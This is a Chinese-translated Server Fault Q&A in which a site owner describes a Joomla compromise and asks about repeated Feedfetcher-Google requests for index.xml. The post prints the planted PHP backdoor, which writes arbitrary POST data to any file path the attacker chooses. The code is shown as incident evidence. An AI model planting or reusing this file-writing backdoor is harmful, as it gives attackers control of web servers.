Hacking

不斷有人請求 index.xml

  • March 8, 2013

我的伺服器最近由於 Joomla 和 allow_url_fopen = ON 而遭到入侵

Restricted accoss
<?php
error_reporting(0); 
ini_set("max_execution_time",0); 
ini_set("default_socket_timeout", 2); 
ob_implicit_flush (1); 
$file = "".$_POST["path"];
$fh = fopen ($file, 'w') or die("");
echo fwrite ($fh, stripslashes($_POST["raw_data"]));
fclose($fh);

所以我關閉了 allow_url_fopen 並刪除了所有這些文件。現在,我的網站在幾分鐘內執行良好,但每隔幾秒鐘就會向該地址發出請求,並在 error_log 中提供此消息

[Thu Mar 07 00:14:00 2013] [error] [client 74.125.185.16] File does not exist: /var/www/html/index.xml

我在 access_log 中看到了很多時間

74.125.179.86 - - [07/Mar/2013:00:15:39 +0000] "GET /index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible) Feedfetcher-Google; (+google.com/feedfetcher.html)"; 

那麼正常嗎?

看起來有人在濫用 Google App Engine。檢查您的 Apache 訪問日誌以獲取該 IP 地址,並且使用者代理字元串應具有其應用程序 ID。然後,您可以向 Google 報告濫用行為。

引用自:https://serverfault.com/questions/485432